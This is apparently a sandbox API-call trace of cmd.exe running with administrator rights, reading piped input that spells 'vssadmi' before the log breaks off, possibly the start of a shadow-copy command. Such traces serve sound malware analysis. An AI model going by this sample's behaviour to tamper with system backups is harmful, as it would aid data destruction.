[0057.088] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce6c8 | out: phkResult=0x2ce6c8*=0x44) returned 0x0 [0057.088] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce6c0, lpData=0x2ce6e0, lpcbData=0x2ce6c4*=0x1000 | out: lpType=0x2ce6c0*=0x0, lpData=0x2ce6e0*=0x40, lpcbData=0x2ce6c4*=0x1000) returned 0x2 [0057.088] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce6c0, lpData=0x2ce6e0, lpcbData=0x2ce6c4*=0x1000 | out: lpType=0x2ce6c0*=0x4, lpData=0x2ce6e0*=0x1, lpcbData=0x2ce6c4*=0x4) returned 0x0 [0057.088] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce6c0, lpData=0x2ce6e0, lpcbData=0x2ce6c4*=0x1000 | out: lpType=0x2ce6c0*=0x0, lpData=0x2ce6e0*=0x1, lpcbData=0x2ce6c4*=0x1000) returned 0x2 [0057.088] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce6c0, lpData=0x2ce6e0, lpcbData=0x2ce6c4*=0x1000 | out: lpType=0x2ce6c0*=0x4, lpData=0x2ce6e0*=0x0, lpcbData=0x2ce6c4*=0x4) returned 0x0 [0057.088] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce6c0, lpData=0x2ce6e0, lpcbData=0x2ce6c4*=0x1000 | out: lpType=0x2ce6c0*=0x4, lpData=0x2ce6e0*=0x9, lpcbData=0x2ce6c4*=0x4) returned 0x0 [0057.088] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce6c0, lpData=0x2ce6e0, lpcbData=0x2ce6c4*=0x1000 | out: lpType=0x2ce6c0*=0x4, lpData=0x2ce6e0*=0x9, lpcbData=0x2ce6c4*=0x4) returned 0x0 [0057.088] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce6c0, lpData=0x2ce6e0, lpcbData=0x2ce6c4*=0x1000 | out: lpType=0x2ce6c0*=0x0, lpData=0x2ce6e0*=0x9, lpcbData=0x2ce6c4*=0x1000) returned 0x2 [0057.088] RegCloseKey (hKey=0x44) returned 0x0 [0057.089] time (in: timer=0x0 | out: timer=0x0) returned 0x5edfa113 [0057.089] srand (_Seed=0x5edfa113) [0057.089] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0057.089] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0057.089] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f6c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0057.089] GetProcessHeap () returned 0x3e0000 [0057.089] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x218) returned 0x3faa10 [0057.089] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3faa20, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0057.089] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f5f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0057.089] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f5f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0057.089] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f5f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0057.089] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0057.089] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0057.089] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0057.090] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0057.090] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0057.090] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0057.090] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0057.090] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0057.090] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0057.090] GetProcessHeap () returned 0x3e0000 [0057.090] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f94f0 | out: hHeap=0x3e0000) returned 1 [0057.090] GetEnvironmentStringsW () returned 0x3f8a60* [0057.090] GetProcessHeap () returned 0x3e0000 [0057.090] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xa94) returned 0x3fac30 [0057.090] FreeEnvironmentStringsW (penv=0x3f8a60) returned 1 [0057.091] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f5f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0057.091] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f5f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0057.091] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0057.091] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0057.091] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0057.091] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0057.091] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0057.091] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0057.091] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0057.091] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0057.091] GetProcessHeap () returned 0x3e0000 [0057.091] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x5c) returned 0x3fb6d0 [0057.091] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf4d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0057.091] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf4d0, lpFilePart=0x2cf4b0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2cf4b0*="Desktop") returned 0x25 [0057.091] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0057.091] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf1e0 | out: lpFindFileData=0x2cf1e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x3fb740 [0057.091] FindClose (in: hFindFile=0x3fb740 | out: hFindFile=0x3fb740) returned 1 [0057.092] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2cf1e0 | out: lpFindFileData=0x2cf1e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3fb740 [0057.092] FindClose (in: hFindFile=0x3fb740 | out: hFindFile=0x3fb740) returned 1 [0057.092] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0057.092] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2cf1e0 | out: lpFindFileData=0x2cf1e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe6071c00, ftLastAccessTime.dwHighDateTime=0x1d63e6c, ftLastWriteTime.dwLowDateTime=0xe6071c00, ftLastWriteTime.dwHighDateTime=0x1d63e6c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x3fb740 [0057.092] FindClose (in: hFindFile=0x3fb740 | out: hFindFile=0x3fb740) returned 1 [0057.092] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0057.092] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0057.092] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0057.092] GetProcessHeap () returned 0x3e0000 [0057.092] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fac30 | out: hHeap=0x3e0000) returned 1 [0057.092] GetEnvironmentStringsW () returned 0x3fb740* [0057.092] GetProcessHeap () returned 0x3e0000 [0057.092] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xae8) returned 0x3fc230 [0057.093] FreeEnvironmentStringsW (penv=0x3fb740) returned 1 [0057.093] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f6c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0057.093] GetProcessHeap () returned 0x3e0000 [0057.093] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fb6d0 | out: hHeap=0x3e0000) returned 1 [0057.093] GetProcessHeap () returned 0x3e0000 [0057.093] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x4016) returned 0x3fcd20 [0057.093] GetProcessHeap () returned 0x3e0000 [0057.093] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fcd20 | out: hHeap=0x3e0000) returned 1 [0057.093] GetConsoleOutputCP () returned 0x1b5 [0057.093] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f6bfe0 | out: lpCPInfo=0x49f6bfe0) returned 1 [0057.093] GetUserDefaultLCID () returned 0x409 [0057.094] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f67b50, cchData=8 | out: lpLCData=":") returned 2 [0057.094] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf5e0, cchData=128 | out: lpLCData="0") returned 2 [0057.094] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf5e0, cchData=128 | out: lpLCData="0") returned 2 [0057.094] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf5e0, cchData=128 | out: lpLCData="1") returned 2 [0057.094] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f7a740, cchData=8 | out: lpLCData="/") returned 2 [0057.094] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f7a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0057.094] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f7a460, cchData=32 | out: lpLCData="Tue") returned 4 [0057.094] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f7a420, cchData=32 | out: lpLCData="Wed") returned 4 [0057.094] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f7a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0057.094] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f7a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0057.094] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f7a360, cchData=32 | out: lpLCData="Sat") returned 4 [0057.094] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f7a700, cchData=32 | out: lpLCData="Sun") returned 4 [0057.094] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f67b40, cchData=8 | out: lpLCData=".") returned 2 [0057.094] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f7a4e0, cchData=8 | out: lpLCData=",") returned 2 [0057.095] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0057.096] GetProcessHeap () returned 0x3e0000 [0057.096] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0x20c) returned 0x3f95c0 [0057.096] GetConsoleTitleW (in: lpConsoleTitle=0x3f95c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0057.096] _get_osfhandle (_FileHandle=1) returned 0x10c [0057.096] GetFileType (hFile=0x10c) returned 0x3 [0057.096] BrandingFormatString () returned 0x3f97e0 [0057.102] GetVersion () returned 0x1db10106 [0057.102] _vsnwprintf (in: _Buffer=0x2cf750, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x2cf6e8 | out: _Buffer="6.1.7601") returned 8 [0057.102] _get_osfhandle (_FileHandle=1) returned 0x10c [0057.102] GetFileType (hFile=0x10c) returned 0x3 [0057.102] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x49f76340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0057.103] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x49f76340, nSize=0x2000, Arguments=0x2cf6f0 | out: lpBuffer="Microsoft Windows [Version 6.1.7601]") returned 0x24 [0057.103] _get_osfhandle (_FileHandle=1) returned 0x10c [0057.103] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 6.1.7601]", cchWideChar=-1, lpMultiByteStr=0x49f6c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 6.1.7601]", lpUsedDefaultChar=0x0) returned 37 [0057.103] WriteFile (in: hFile=0x10c, lpBuffer=0x49f6c320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x2cf678, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesWritten=0x2cf678*=0x24, lpOverlapped=0x0) returned 1 [0057.103] _vsnwprintf (in: _Buffer=0x49f76340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cf718 | out: _Buffer="\r\n") returned 2 [0057.103] _get_osfhandle (_FileHandle=1) returned 0x10c [0057.103] GetFileType (hFile=0x10c) returned 0x3 [0057.103] _get_osfhandle (_FileHandle=1) returned 0x10c [0057.103] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x49f6c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0057.103] WriteFile (in: hFile=0x10c, lpBuffer=0x49f6c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2cf6e8, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesWritten=0x2cf6e8*=0x2, lpOverlapped=0x0) returned 1 [0057.103] _vsnwprintf (in: _Buffer=0x49f76340, _BufferCount=0x1fff, _Format="%s", _ArgList=0x2cf718 | out: _Buffer="Copyright (c) 2009 Microsoft Corporation. All rights reserved.") returned 63 [0057.103] _get_osfhandle (_FileHandle=1) returned 0x10c [0057.103] GetFileType (hFile=0x10c) returned 0x3 [0057.103] _get_osfhandle (_FileHandle=1) returned 0x10c [0057.103] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", cchWideChar=-1, lpMultiByteStr=0x49f6c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", lpUsedDefaultChar=0x0) returned 64 [0057.103] WriteFile (in: hFile=0x10c, lpBuffer=0x49f6c320*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x2cf6e8, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesWritten=0x2cf6e8*=0x3f, lpOverlapped=0x0) returned 1 [0057.103] _vsnwprintf (in: _Buffer=0x49f76340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cf718 | out: _Buffer="\r\n") returned 2 [0057.103] _get_osfhandle (_FileHandle=1) returned 0x10c [0057.104] GetFileType (hFile=0x10c) returned 0x3 [0057.104] _get_osfhandle (_FileHandle=1) returned 0x10c [0057.104] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x49f6c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0057.104] WriteFile (in: hFile=0x10c, lpBuffer=0x49f6c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2cf6e8, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesWritten=0x2cf6e8*=0x2, lpOverlapped=0x0) returned 1 [0057.104] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0057.104] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0057.104] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0057.104] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0057.105] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.105] GetFileType (hFile=0xa4) returned 0x3 [0057.105] _setmode (_FileHandle=0, _Mode=32768) returned 16384 [0057.105] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x2cf540 | out: TokenHandle=0x2cf540*=0x0) returned 0xc000007c [0057.105] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x2cf540 | out: TokenHandle=0x2cf540*=0x50) returned 0x0 [0057.105] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x12, TokenInformation=0x2cf550, TokenInformationLength=0x4, ReturnLength=0x2cf558 | out: TokenInformation=0x2cf550, ReturnLength=0x2cf558) returned 0x0 [0057.105] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x1a, TokenInformation=0x2cf558, TokenInformationLength=0x4, ReturnLength=0x2cf550 | out: TokenInformation=0x2cf558, ReturnLength=0x2cf550) returned 0x0 [0057.105] NtClose (Handle=0x50) returned 0x0 [0057.105] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x2cf520, nSize=0x0, Arguments=0x2cf528 | out: lpBuffer="韠?") returned 0xf [0057.105] GetProcessHeap () returned 0x3e0000 [0057.105] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x218) returned 0x3e1ab0 [0057.105] GetConsoleTitleW (in: lpConsoleTitle=0x2cf570, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0057.106] wcsstr (_Str="C:\\Windows\\system32\\cmd.exe", _SubStr="Administrator: ") returned 0x0 [0057.106] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0057.106] GetProcessHeap () returned 0x3e0000 [0057.106] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1ab0 | out: hHeap=0x3e0000) returned 1 [0057.106] LocalFree (hMem=0x3f97e0) returned 0x0 [0057.106] GetProcessHeap () returned 0x3e0000 [0057.106] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3faa10 | out: hHeap=0x3e0000) returned 1 [0057.107] _vsnwprintf (in: _Buffer=0x49f76340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cf258 | out: _Buffer="\r\n") returned 2 [0057.107] _get_osfhandle (_FileHandle=1) returned 0x10c [0057.107] GetFileType (hFile=0x10c) returned 0x3 [0057.107] _get_osfhandle (_FileHandle=1) returned 0x10c [0057.107] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x49f6c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0057.107] WriteFile (in: hFile=0x10c, lpBuffer=0x49f6c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2cf228, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesWritten=0x2cf228*=0x2, lpOverlapped=0x0) returned 1 [0057.107] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f5f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0057.107] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f6c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0057.107] _vsnwprintf (in: _Buffer=0x49f5eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2cf268 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0057.107] _vsnwprintf (in: _Buffer=0x49f5ebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2cf268 | out: _Buffer=">") returned 1 [0057.107] _get_osfhandle (_FileHandle=1) returned 0x10c [0057.107] GetFileType (hFile=0x10c) returned 0x3 [0057.107] _get_osfhandle (_FileHandle=1) returned 0x10c [0057.108] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x49f6c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", lpUsedDefaultChar=0x0) returned 39 [0057.108] WriteFile (in: hFile=0x10c, lpBuffer=0x49f6c320*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2cf258, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesWritten=0x2cf258*=0x26, lpOverlapped=0x0) returned 1 [0057.108] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.108] GetFileType (hFile=0xa4) returned 0x3 [0057.108] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.108] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.108] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.108] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e320, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0057.111] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.111] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.111] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.111] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e322, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0057.112] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.112] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.112] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.112] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e324, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0057.112] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.112] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.112] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.112] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e326, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0057.112] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.112] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.112] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.112] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e328, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0057.112] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.112] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.112] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.112] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e32a, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0057.112] _get_osfhandle (_FileHandle=0) returned 0xa4 [0057.112] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.112] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0057.112] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e32c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 